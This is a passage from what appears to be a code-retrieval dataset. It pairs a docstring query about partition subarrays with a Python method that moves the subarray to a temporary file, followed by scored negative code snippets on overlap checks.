query
stringlengths 9
3.4k
| document
stringlengths 9
87.4k
| metadata
dict | negatives
sequencelengths 4
101
| negative_scores
sequencelengths 4
101
| document_score
stringlengths 3
10
| document_rank
stringclasses 102
values |
---|---|---|---|---|---|---|
Return True if the subarray overlaps a subspace of the master array. | def overlaps(self, indices):
p_indices = []
shape = []
if not indices:
return p_indices, shape
for index, (r0, r1), size in zip(indices, self.location, self.shape):
if isinstance(index, slice):
stop = size
if index.stop < r1:
stop -= r1 - index.stop
start = index.start - r0
if start < 0:
start %= index.step # start is now +ve
if start >= stop:
# This partition does not span the slice
return None, None
# Still here?
step = index.step
index = slice(start, stop, step)
index_size, rem = divmod(stop - start, step)
if rem:
index_size += 1
else:
# Still here?
index = [i - r0 for i in index if r0 <= i < r1]
index_size = len(index)
if index_size == 0:
return None, None
elif index_size == 1:
index = slice(index[0], index[0] + 1)
else:
index0 = index[0]
step = index[1] - index0
if step > 0:
start, stop = index0, index[-1] + 1
elif step < 0:
start, stop = index0, index[-1] - 1
if index == list(range(start, stop, step)):
# Replace the list with a slice object
if stop < 0:
stop = None
index = slice(start, stop, step)
# --- End: if
p_indices.append(index)
shape.append(index_size)
# --- End: for
# Still here? Then this partition does span the slice and the
# elements of this partition specified by p_indices are in the
# slice.
return p_indices, shape | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def can_overlap(self):\n return False",
"def overlaps_with_subspace(wavefunc: dict, subspace: list) -> bool:\n assert isinstance(wavefunc, dict), 'Please provide your state as a dict.'\n assert isinstance(subspace, list), 'Please provide subspace as a list of str.'\n\n # Deal with empty subspace:\n if not subspace:\n return False\n assert isinstance(subspace[0], str), 'Please provide subspace as a list of str.'\n assert len(wavefunc) >= len(subspace)\n tol = 1e-7\n\n for basisvector in subspace:\n if abs(wavefunc[basisvector]) > tol:\n return True\n\n return False",
"def overlaps(self, other): # -> bool:\n ...",
"def is_overlap(self, transposon):\n if self.first <= transposon.last <= self.last:\n return True\n elif self.first <= transposon.first <= self.last:\n return True\n else:\n return False",
"def check_overlap(a, b):\n if a[0] >= b[2] or a[1] >= b[3] or a[2] <= b[0] or a[3] <= b[1]:\n return False\n return True",
"def if_overlap(self, x, y) -> bool:\n if self.pos[y][x] != '-':\n print('此坐标已有棋子,请仔细观察棋盘')\n return True\n return False",
"def check_overlap(current, hit, overlap = 200):\n for prev in current:\n p_coords = prev[2:4]\n coords = hit[2:4]\n if get_overlap(coords, p_coords) >= overlap:\n return True\n return False",
"def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1 << memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1 << i\n if visited & bit:\n return True\n visited |= bit\n return False",
"def is_overlapping(self, region):\n if self.x2 < region.x1:\n return False # this box is left the other\n if self.x1 > region.x2:\n return False # this box is right the other\n if self.y2 < region.y1:\n return False # this box is above the other\n if self.y1 > region.y2:\n return False # this box is below the other\n return True",
"def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1<<memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1<<i\n if visited & bit:\n return True\n visited |= bit\n return False",
"def does_overlap(self, start, stop):\n\n ranges = [list(range(key, self.map[key] + 1)) for key in self.map]\n all_coords = [item for sublist in ranges for item in sublist]\n # removing all_coords implementation until we write some tests\n for i in range(start, stop + 1):\n if i in all_coords:\n return True\n return False",
"def span_overlap(a: Tuple[int, int], b: Tuple[int, int]) -> bool:\n return not (a[0] > b[1] or a[1] < b[0])",
"def overlaps(self, that):\n if (not isinstance(that, Annotation)):\n raise ValueError(\"Argument for intersects should be an annotation\")\n\n if (self.bbox.xmin >= that.bbox.xmax or that.bbox.xmin >= self.bbox.xmax):\n return False\n\n # the coordinates are inverted, so y0 is larger than y1\n if (self.bbox.ymin >= that.bbox.ymax or that.bbox.ymin >= self.bbox.ymax):\n return False\n\n return True",
"def _overlapping(self, atom1, atom2):\n\n if np.linalg.norm(atom1.pos-atom2.pos) < (atom1.rad+atom2.rad):\n return True\n else:\n return False",
"def can_overlap(self):\n return self.is_open",
"def can_overlap(self):\n return self.is_open",
"def check_subarray(array1, array2):\r\n \r\n # check assumption\r\n if (len(array2.shape) != 1) or (array2.shape[0] != array1.shape[-1]):\r\n raise ValueError('Attempting to check for subarray equality when shape assumption does not hold.')\r\n \r\n return np.all(array1==array2, axis=-1)",
"def is_contiguous(arr):\n mn, mx = min(arr), max(arr)\n s = sum(arr)\n sn = (mn*(mn-1))/2 if mn!=0 else 0\n sx = (mx*(mx+1))/2\n if s == sx-sn:\n return True\n else:\n return False",
"def overlaps(self, other):\n return _binary_op(arctern.ST_Overlaps, self, other).astype(bool, copy=False)",
"def overlaps(self, region):\n region = as_region(region)\n\n if region.chromosome != self.chromosome:\n return False\n\n if self.end is None or region.start is None or region.start <= self.end:\n if self.start is None or region.end is None or region.end >= self.start:\n return True\n return False",
"def have_overlap(self,\n entry1: Union[Annotation, int],\n entry2: Union[Annotation, int]) -> bool:\n entry1_: Annotation = self._entry_index[\n entry1] if isinstance(entry1, (int, np.integer)) else entry1\n entry2_: Annotation = self._entry_index[\n entry2] if isinstance(entry2, (int, np.integer)) else entry1\n\n if not isinstance(entry1_, Annotation):\n raise TypeError(f\"'entry1' should be an instance of Annotation,\"\n f\" but get {type(entry1)}\")\n\n if not isinstance(entry2_, Annotation):\n raise TypeError(f\"'entry2' should be an instance of Annotation,\"\n f\" but get {type(entry2)}\")\n\n return not (entry1_.span.begin >= entry2_.span.end or\n entry1_.span.end <= entry2_.span.begin)",
"def overlap(component1, component2):\n if component1[0].start <= component2[0].stop and component2[0].start <= component1[0].stop:\n if component1[1].start <= component2[1].stop and component2[1].start <= component1[1].stop:\n return True\n return False",
"def doesNotOverlap( self, other):\n return not self.overlaps( other)",
"def _bbox_overlap(self, other):\n reg0 = self.bbox\n reg1 = other.bbox\n return (reg0[0] <= reg1[2] and reg1[0] <= reg0[2] and\n reg0[1] <= reg1[3] and reg1[1] <= reg0[3])",
"def is_overlapping(box1, box2):\n if box1[2] <= box2[0]: # If box1 is to the left of box2\n return False\n elif box1[0] >= box2[2]: # If box1 is to the right of box2\n return False\n elif box1[3] <= box2[1]: # If box1 is below box2\n return False\n elif box1[1] >= box2[3]: # If box1 is above box2\n return False\n else:\n return True",
"def _overlap(x1, w1, x2, w2):\r\n if x1+w1 < x2-w2: return False\r\n if x1-w1 > x2+w2: return False\r\n\r\n return True",
"def _intersects_1D(A, B):\n return False if (B[1] <= A[0]) or (B[0] >= A[1]) else True",
"def is_subspan(a: Tuple[int, int], b: Tuple[int, int]) -> bool:\n if a[0] >= b[0] and a[1] <= b[1]:\n return True\n else:\n return False",
"def has_atomic_overlaps(self):\n atomic_overlaps = self._get_atomic_overlaps()\n return len(atomic_overlaps) > 0",
"def overlaps(self, other):\n return (self.right > other.left and self.left < other.right and\n self.top < other.bottom and self.bottom > other.top)",
"def overlap_conflict(out, *inputs):\n from . import _bh\n\n for i in inputs:\n if not np.isscalar(i):\n if np.may_share_memory(out, i) and not _bh.same_view(out, i):\n return True\n return False",
"def detect_overlap_1d(first, first_length, second, second_length):\n first_end = first + first_length - 1\n second_end = second + second_length - 1\n return second_end >= first and first_end >= second",
"def overlaps(self,b):\n if b.chr != self.chr :return False\n if (self.start <= b.start and b.start <=self.end) or (self.start >= b.start and self.start <= b.end):\n return True\n else:\n return False",
"def test_idx_overlap():\n # Base array\n arr = np.arange(10)\n\n # Test subset overlap\n idx = u.idx_overlap(arr, np.arange(5, 8))\n assert len(idx) == 3\n\n # Test complete overlap\n idx = u.idx_overlap(arr, np.arange(-5, 20))\n assert len(idx) == 8\n\n # Test partial right overlap\n idx = u.idx_overlap(arr, np.arange(5, 20))\n assert len(idx) == 4\n\n # Test partial left overlap\n idx = u.idx_overlap(arr, np.arange(-5, 5))\n assert len(idx) == 4\n\n # Test no overlap\n idx = u.idx_overlap(arr, np.arange(10, 20))\n assert len(idx) == 0",
"def has_next(self):\n while self._row < self._n and not self._arr[self._row]: # current sub-array is empty\n self._row += 1 # move to next sub-array\n self._col = 0\n if self._row >= self._n: # end of master-array already\n return False\n return True",
"def isOverlap(peak, ref_distance_map, ref_distance_indexmap):\n chromosome = peak[0]\n start = int(peak[1])\n end = int(peak[2])\n\n if chromosome not in ref_distance_indexmap:\n return False\n\n indexes = ref_distance_indexmap[chromosome]\n\n left_index = bisect(indexes, start)\n right_index = bisect(indexes, end)\n\n # the rational is if overlap, the distance is zero\n candidate_regions = set()\n\n potential_indexes = []\n\n left_index = left_index - 10 if left_index - 10 >= 0 else 0\n for index in indexes[left_index - 1: right_index+10]:\n potential_indexes.append(index)\n\n for feature_position in potential_indexes:\n candidate_regions = candidate_regions.union(ref_distance_map[chromosome][feature_position])\n\n for region in candidate_regions:\n if start <= region.start <= end:\n return True\n if start <= region.end <= end:\n return True\n if region.start <= start and end <= region.end:\n return True\n return False",
"def check_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'spec'):\n for i, spectrum in enumerate(self.spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.spec[spectrum]._add_to_overlapping_filters(filtername, verbose=verbose)\n else:\n warnings.warn(\"SNClass.check_overlaps - something went wrong... no data?\")\n pass",
"def check_overlap(self, a, b):\n return utils.is_point_in_circle(b.get_pos(), a.get_pos(), a.radius)",
"def contains(self, coord):\n # print(coord, self.position, self.size)\n return (0 <= coord[0] - self.position[0] < self.size[0] and\n 0 <= coord[1] - self.position[1] < self.size[1])",
"def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False",
"def bbox_overlap(bbox_1: Sequence, bbox_2: Sequence) -> bool:\n if (bbox_1[0] > bbox_2[0]) or (bbox_1[1] > bbox_2[1]):\n return False\n if (bbox_1[2] < bbox_2[2]) or (bbox_1[3] < bbox_2[3]):\n return False\n\n return True",
"def _array_name_implies_ND_slice(self, array_name):\n for v in self._split_arrays.values():\n if array_name in v:\n return True\n\n generic_match = re.findall(\"^(.+)_[xyz]$\", array_name)\n loadable_keys = self.loadable_keys()\n keys = list(self.keys())\n if len(generic_match) == 1 and generic_match[0] not in self._split_arrays:\n return generic_match[0] in loadable_keys or generic_match[0] in keys\n return False",
"def __is_position_overlapped(self, position, exon):\n start, end = self.__get_exon_coordinates(exon)\n return position >= start and position <= end",
"def covers_overlaps(self, bounds):\n bounds = tuple(float(b) for b in bounds)\n return self.numba_rtree.covers_overlaps(bounds)",
"def is_overlapping(segment_time, previous_segments):\n \n segment_start, segment_end = segment_time\n overlap = False\n for previous_start, previous_end in previous_segments:\n if previous_start<=segment_start<=previous_end or previous_start<=segment_end<=previous_end:\n overlap = True\n\n return overlap",
"def overlap(a: Pos, b: Pos, exact: bool = False) -> bool:\n if a == b:\n return True\n elif exact:\n return False\n s0, e0 = a\n s1, e1 = b\n if in_interval(s1, s0, e0):\n return True\n if in_interval(e1, s0, e0):\n return True\n if in_interval(s0, s1, e1):\n return True\n if in_interval(e0, s1, e1):\n return True\n return False",
"def overlap_checker(x1, y1, x2, y2, all_coord):\n overlaps = False\n i = 0\n start = 0\n for i in range(int(len(all_coord)/4)):\n b = all_coord[start:start + 4]\n start += 4\n try:\n if (max(b[0], b[2]) <= min(x1, x2) or max(x1, x2) <= min(b[0], b[2]) or max(b[1], b[3]) <= min(y1, y2) or max(y1, y2) <= min(b[1], b[3])):\n if not (min(x1, x2) <= min(b[0], b[2]) and min(y1, y2) <= min(b[1], b[3]) and max(x1, x2) >= max(b[0], b[2]) and max(y1, y2) >= max(b[1], b[3])):\n if not (min(b[0], b[2]) <= min(x1, x2) and min(b[1], b[3]) <= min(y1, y2) and max(b[0], b[2]) >= max(x1, x2) and max(b[1], b[3]) >= max(y1, y2)):\n overlaps = False\n else:\n return True\n else:\n return True\n else:\n return True\n except TypeError:\n overlaps = False\n if not overlaps:\n return False",
"def is_subset(subset: np.array, superset: np.array) -> bool:\n superset_lookup = set(superset)\n for val in subset:\n if val not in superset_lookup:\n return False\n\n return True",
"def intersects(self, other): # -> bool:\n ...",
"def CheckOverlap(self, via):\r\n\r\n for item in self.overlappings:\r\n if type(item) is pcbnew.PAD:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) is pcbnew.PCB_VIA:\r\n # Overlapping with vias work best if checking is performed by intersection\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) in [pcbnew.ZONE, pcbnew.FP_ZONE]:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) is pcbnew.PCB_TRACK:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n width = item.GetWidth()\r\n dist, _ = pnt2line(via.GetPosition(), item.GetStart(), item.GetEnd())\r\n if dist <= self.clearance + width // 2 + via.GetWidth() / 2:\r\n return True\r\n return False",
"def overlap(array1,array2,thresh=0.05e0):\r\n arrayout = array1 * array2\r\n thresh2 = np.max(np.abs(arrayout))*thresh\r\n arrayout = np.array(1.0 * (np.abs(arrayout) > thresh2),dtype=np.bool)\r\n return arrayout",
"def is_overlap(box_1, box_2, iou_th):\n return box_1.iou(box_2) > iou_th",
"def in_array(array1, array2):",
"def overlap(a, b):\n return not(a[2]<=b[0] or a[3]<=b[1] or a[0]>=b[2] or a[1]>=b[3])",
"def overlaps(self, other):\n return self.start <= other.end and self.end >= other.start",
"def intersects(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def accurate_collision(self, other) -> bool:\r\n if self.collide:\r\n if self.bbox_intersect(other):\r\n offset = round(self.x - other.x), \\\r\n round(self.y - other.y)\r\n if self.mask.overlap(other.mask, offset): # Overlap returns None or 1 point\r\n return True\r\n return False\r\n else:\r\n return False",
"def overlaps(self, other):\n\n if self.ll.x >= other.ur.x:\n return False\n \n if self.ll.y >= other.ur.y:\n return False\n \n if self.ur.x <= other.ll.x:\n return False\n \n if self.ur.y <= other.ll.y:\n return False\n \n return True",
"def check_sim_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'spec'):\n for i, spectrum in enumerate(self.sim_spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.sim_spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.sim_spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.sim_spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.sim_spec[spectrum]._add_to_overlapping_filters(filtername, verbose=verbose)\n else:\n warnings.warn(\"SNClass.check_sim_overlaps - something went wrong... no data?\")\n pass",
"def _get_overlap(data: Union[np.ndarray, ma.MaskedArray],\n other_data: Union[np.ndarray, ma.MaskedArray]) \\\n -> np.ndarray:\n if isinstance(data, ma.MaskedArray):\n if isinstance(other_data, ma.MaskedArray):\n return (~data.mask) & (~other_data.mask)\n return ~data.mask\n if isinstance(other_data, ma.MaskedArray):\n return ~other_data.mask\n return np.array(True)",
"def subcontrary_with(self, other: 'Concept') -> bool:\n return (self._extent & other._extent\n and (self._extent | other._extent) == self.lattice.supremum._extent)",
"def __isScanContained(self, subms, scanlist, tbin):\n isContained = False \n \n mymsmd = msmdtool()\n mymsmd.open(subms)\n \n # Check if subms scans contain all selected scans\n hasScans = False\n s = mymsmd.scannumbers()\n subms_scans = map(str, s)\n if set(scanlist) <= set(subms_scans):\n hasScans = True\n \n if hasScans:\n t = mymsmd.timesforscans(s)\n mymsmd.close()\n t_range = t.max() - t.min()\n \n if t_range >= tbin: \n isContained = True\n \n return isContained",
"def _does_token_overlap_with_annotation(\n token: Token, annot_start: int, annot_end: int\n) -> bool:\n\n return (\n annot_start <= token.idx <= annot_end\n or token.idx <= annot_start <= token.idx + len(token)\n )",
"def is_overlap(bb1, bb2):\n l1, t1, r1, b1 = bb1['x'], bb1['y'], bb1['x']+bb1['w'], bb1['y']+bb1['h']\n l2, t2, r2, b2 = bb2['x'], bb2['y'], bb2['x']+bb2['w'], bb2['y']+bb2['h']\n\n if r1 > l2 and r2 > l1 and b2 > t1 and b1 > t2:\n return True\n else:\n return False",
"def is_subseq(subseq, superseq):\n start = 0\n try:\n for ee in subseq:\n start = superseq.index(ee, start) + 1\n except ValueError:\n return False\n return True",
"def iOverlap (a1, a2, b1, b2):\n if b1<=a1<=b2 or b1<=a2<=b2 or a1<=b1<=a2 or a1<=b2<=a2:\n return True\n elif a1>a2 or b1>b2:\n return False\n else:\n return False",
"def overlaps(self, right: GeoSpatialValue) -> ir.BooleanValue:\n return ops.GeoOverlaps(self, right).to_expr()",
"def overlap(range1, range2):\n if range1[0] <= range2[1] and range2[0] <= range1[1]:\n return True\n return False",
"def do_box_overlap(coord1, coord2):\n return (\n (coord1[0] - 2 < coord2[0] and coord1[1] + 2 > coord2[0]\n or coord2[0] - 2 < coord1[0] and coord2[1] + 2 > coord1[0]) \n and (coord1[2] - 2 < coord2[2] and coord1[3] + 2 > coord2[2]\n or coord2[2] - 2 < coord1[2] and coord2[3] + 2 > coord1[2]))",
"def createSubdivRegion(*args, **kwargs)->bool:\n pass",
"def is_subset(self, other):",
"def is_mountain_array(self, a):\r\n n = len(a)\r\n if n < 3:\r\n return False\r\n # Invalidate monotonic slopes\r\n elif (a[0] > a[1] or\r\n a[n - 2] < a[n - 1]):\r\n return False\r\n\r\n p = None\r\n for i in range(0, n - 1):\r\n\r\n # Search for local maxima\r\n if p is None:\r\n if a[i] > a[i + 1]:\r\n p = i\r\n if a[i] == a[i + 1]:\r\n return False\r\n\r\n # Confirm maxima as global maxima\r\n else:\r\n if a[i] <= a[i + 1]:\r\n return False\r\n\r\n return True",
"def overlaps(self, other):\n\n if self.start.equal(other.start) or self.stop.equal(other.stop):\n return True\n elif self.start.before(other.start) and self.stop.after(other.start):\n return True\n elif other.stop.after(self.start) and other.stop.before(self.stop):\n return True\n else:\n return False",
"def __contains__(self, item: 'BoundingBox2D') -> bool:\n top_left_inside = item.xmin >= self.xmin and item.ymin >= self.ymin\n bottom_right_inside = item.xmax <= self.xmax and item.ymax <= self.ymax\n return top_left_inside and bottom_right_inside",
"def overlap(\n state: State, # pylint: disable=unused-argument\n action: Action, # pylint: disable=unused-argument\n next_state: State,\n *,\n object_type: Type[GridObject],\n) -> bool:\n return isinstance(next_state.grid[next_state.agent.position], object_type)",
"def doBoundingBoxesIntersect(self, other):\n if(self.upperLeft.x <= other.lowerRight.x and\n self.lowerRight.x >= other.upperLeft.x and\n self.upperLeft.y >= other.lowerRight.y and\n self.lowerRight.y <= other.upperLeft.y):\n return True\n return False",
"def is_inside_np(self, NPs, idx):\n for np in NPs:\n if np[0] <= idx and np[1] > idx:\n return True\n return False",
"def is_subdivision_available(self, position: np.ndarray) -> bool:\n\t\tsubdivision_x_index = int(position[0]) // self.square_subdivision_length\n\t\tsubdivision_y_index = int(position[1]) // self.square_subdivision_length\n\t\treturn self.plane_subdivisions_availability[subdivision_x_index, subdivision_y_index] == 1",
"def is_colliding(network, allocations):\n for allocation in allocations:\n if network.overlaps(allocation):\n return True\n return False",
"def check_recon_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'recon_spec'):\n for i, spectrum in enumerate(self.recon_spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.recon_spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.recon_spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.recon_spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.recon_spec[spectrum]._add_to_overlapping_filters(filtername)\n else:\n warnings.warn(\"SNClass.check_sim_overlaps - something went wrong... no data?\")\n pass",
"def overlap(p1: Tuple, p2: Tuple) -> bool:\n if (p2[1] - p1[0]) * (p2[0] - p1[1]) <= 0:\n return True\n else:\n return False",
"def is_subsequence(subseq, seq):\n n = len(seq)\n m = len(subseq)\n\n if m > n:\n return False\n\n i = 0 # index of seq\n j = 0 # index of subseq\n\n while i < n and j < m:\n if seq[i] == subseq[j]:\n j += 1\n i += 1\n\n return j == m",
"def isFullyContained(self,b):\n if b.chr != self.chr: return False\n if(b.start>=self.start and b.end<=self.end):return True\n else:\n return False",
"def __contains__(self, x: ArrayLike) -> bool:\n\n return bool(\n np.all(\n np.where(\n np.logical_and(\n x >= np.min(self._domain), # pyright: ignore\n x <= np.max(self._domain), # pyright: ignore\n ),\n True,\n False,\n )\n )\n )",
"def is_subset(a, b):\n return any(map(lambda x: b[x:x + len(a)] == a, range(len(b) - len(a) + 1)))",
"def _inside_bounds(A, B):\n for axis in 'xyz':\n minA, maxA = axis_bounds(A, axis)\n minB, maxB = axis_bounds(B, axis)\n if (minA <= minB) or (maxA >= maxB):\n return False\n\n return True",
"def overlap(x,y):\n if (x[0]<=y[-1] and x[-1]>y[0]) or (y[0]<=x[-1] and y[-1]>x[0]):\n return 1\n else: return 0",
"def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8",
"def test_overlap(self):\r\n rect1 = Rectangle(10, 20, 30, 40)\r\n rect2 = Rectangle(50, 60, 70, 80)\r\n\r\n # overlap should be commutative\r\n assert not rect1.overlap_with(rect2)\r\n assert not rect2.overlap_with(rect1)\r\n assert not Rectangle.overlap(rect1, rect2)\r\n assert not Rectangle.overlap(rect2, rect1)\r\n\r\n rect1 = Rectangle(-10, -20, 10, 60)\r\n rect2 = Rectangle(0, 50, 100, 200)\r\n assert rect1.overlap_with(rect2)\r\n assert rect2.overlap_with(rect1)\r\n assert Rectangle.overlap(rect1, rect2)\r\n assert Rectangle.overlap(rect2, rect1)\r\n\r\n # rectangles with only same boarder are not considered overlapped\r\n rect1 = Rectangle(-30, -10, -20, 0)\r\n rect2 = Rectangle(-20, -5, 30, 20)\r\n rect3 = Rectangle(-40, 0, 30, 20)\r\n assert not rect1.overlap_with(rect2)\r\n assert not rect1.overlap_with(rect3)\r\n assert not Rectangle.overlap(rect2, rect1)\r\n assert not Rectangle.overlap(rect3, rect1)",
"def IsSubShape(self, *args):\n return _XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape(self, *args)",
"def overlaps_minmaxlatlon(self,other):\n self_corners = get_2d_false_corners(self)\n other_corners = get_2d_false_corners(other)\n log.info(' Swath 2d False Corners: '+str(self_corners))\n log.info(' Other 2d False Corners: '+str(other_corners))\n\n for i in self_corners:\n if planar_point_inside(i,other_corners):\n return True\n for i in other_corners:\n if planar_point_inside(i,self_corners):\n return True\n return False",
"def overlaps(x1, x2, y1, y2):\n\n return x1 <= y2 and y1 <= x2",
"def overlaps(self, other):\n pass",
"def __eq__(self, other: Segment) -> bool:\n return any(\n (\n self.start == other.start and self.end == other.end,\n self.start == other.end and self.end == other.start,\n )\n )",
"def prekryvaSa(self,inyPrekryvac):\n offset = (int(inyPrekryvac.x-self.x),int(inyPrekryvac.y-self.y))\n if self.mask.overlap(inyPrekryvac.mask,offset) is None:\n return True\n return False",
"def overlap(start1, end1, start2, end2):\n return not (end1 < start2 or end2 < start1)",
"def is_overlappedResort(self, resort):\n for corner in resort.corners:\n if self.is_point_in(corner):\n return True\n for corner in self.corners:\n if resort.is_point_in(corner):\n return True\n if self.intersection_area(resort) > 0:\n return True\n return False",
"def contains(outer, inner):\n return inner.tl.x >= outer.tl.x and inner.tl.y >= outer.tl.y and \\\n inner.br.x <= outer.br.x and inner.br.y <= outer.br.y",
"def is_contained_in(self, other):\n return ((\n self.lower == other.lower and (not self.lower_inc or other.lower_inc) or\n self.lower > other.lower\n ) and (\n self.upper == other.upper and (not self.upper_inc or other.upper_inc) or\n self.upper < other.upper\n ))",
"def Overlaps(self, o, pos=None):\r\n if pos == None:\r\n pos = o.position\r\n return _overlap(self.position.x-self.bulk, self.size.x+2*self.bulk, pos.x-o.bulk, o.size.x+o.bulk*2) and \\\r\n _overlap(self.position.y-self.bulk, self.size.y+2*self.bulk, pos.y-o.bulk, o.size.y+o.bulk*2) and \\\r\n _overlap(self.position.z-self.bulk, self.size.z+2*self.bulk, pos.z-o.bulk, o.size.z+o.bulk*2)",
"def overlaps(self, other):\n\n isOverlaps = False\n\n if self.ipv4 is not None:\n isOverlaps = self.ipv4.overlaps(other.ipv4) \n\n if isOverlaps is False:\n if self.ipv6 is not None:\n isOverlaps = self.ipv6.overlaps(other.ipv6) \n\n return isOverlaps"
] | [
"0.69049424",
"0.6542034",
"0.65178",
"0.64850175",
"0.6401799",
"0.6352982",
"0.63502485",
"0.6326871",
"0.6323529",
"0.6288298",
"0.62626195",
"0.6232904",
"0.62079996",
"0.617383",
"0.61473817",
"0.61473817",
"0.6106171",
"0.6056349",
"0.6024105",
"0.59949875",
"0.59726655",
"0.5966163",
"0.5958605",
"0.59422714",
"0.590773",
"0.5881997",
"0.58727026",
"0.58662075",
"0.58597267",
"0.58321947",
"0.58185846",
"0.5813276",
"0.58040094",
"0.5768039",
"0.5735788",
"0.57355607",
"0.57206887",
"0.5712751",
"0.5711483",
"0.5708836",
"0.5702264",
"0.5698469",
"0.5685704",
"0.5682803",
"0.56815547",
"0.5672477",
"0.5670648",
"0.56674373",
"0.56638736",
"0.56502444",
"0.56451404",
"0.5638265",
"0.56214666",
"0.56197",
"0.56178874",
"0.5610739",
"0.559932",
"0.5578598",
"0.5573683",
"0.55671746",
"0.55666226",
"0.5552426",
"0.55448955",
"0.5543381",
"0.5539878",
"0.5539754",
"0.5537215",
"0.5533756",
"0.55276364",
"0.5522864",
"0.5511265",
"0.55068505",
"0.5506014",
"0.54860747",
"0.5481412",
"0.5463262",
"0.5462693",
"0.546078",
"0.5457932",
"0.5455711",
"0.54550976",
"0.5452392",
"0.5437028",
"0.54330957",
"0.54268086",
"0.5425244",
"0.5421903",
"0.5420718",
"0.54165596",
"0.54136384",
"0.54077303",
"0.5394485",
"0.5393951",
"0.5392487",
"0.53907424",
"0.53862226",
"0.5380586",
"0.5378822",
"0.53760177",
"0.5373552",
"0.5366686"
] | 0.0 | -1 |
Move the partition's subarray to a temporary file on disk. | def to_disk(self, reopen=True):
# try:
tfa = CachedArray(self.array)
# except Exception:
# return False
fd, _lock_file = mkstemp(
prefix=tfa._partition_file + "_", dir=tfa._partition_dir
)
close(fd)
self.subarray = tfa
_temporary_files[tfa._partition_file] = (
tfa._partition_dir,
_lock_file,
set(),
)
if reopen:
# Re-open the partition
self.open(self.config)
return True | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def close(self, **kwargs):\n config = getattr(self, \"config\", None)\n\n if config is None:\n return\n\n if kwargs:\n config.update(kwargs)\n\n original = getattr(self, \"_original\", None)\n logger.partitioning(\"Partition.close: original = {}\".format(original))\n\n if not original:\n originally_on_disk = False\n original_subarray = None\n else:\n originally_on_disk = not original.in_memory\n original_subarray = original._subarray\n\n config = self.config\n logger.partitioning(\" config = {}\".format(config))\n\n if config[\"serial\"]:\n # --------------------------------------------------------\n # SERIAL\n # --------------------------------------------------------\n logger.partitioning(\" serial\")\n\n if config[\"readonly\"]:\n logger.partitioning(\" readonly=True\")\n\n if originally_on_disk:\n logger.partitioning(\" subarray originally on disk\")\n\n if config.get(\"to_disk\", False):\n # 1.1.1.1 The original subarray was on disk,\n # we don't want to keep the current\n # subarray in memory, and we are happy\n # to discard any changes that may have\n # been made to the subarray.\n logger.partitioning(\" 1.1.1.1 revert\")\n self.revert()\n elif free_memory() <= cf_fm_threshold():\n # 1.1.1.2 The original subarray was on disk,\n # we are happy to keep the current\n # subarray in memory, but there is not\n # enough free memory to do so.\n logger.partitioning(\n \" 1.1.1.2 revert ({} <= {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n self.revert()\n else:\n # 1.1.1.3 The original subarray was on disk\n # and there is enough memory to keep\n # the current subarray in memory\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # The original subarray was a temporary\n # file which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n del self.masked\n logger.partitioning(\n \" 1.1.1.3 del masked ({} > {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n\n else:\n logger.partitioning(\" subarray originally in memory\")\n if config.get(\"to_disk\", False):\n # 1.1.2.1 Original subarray was in memory and\n # we don't want to keep the current\n # subarray in memory\n logger.partitioning(\" 1.1.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.1.2.2 Original subarray was in memory and\n # unique but there is not enough\n # memory to keep the current 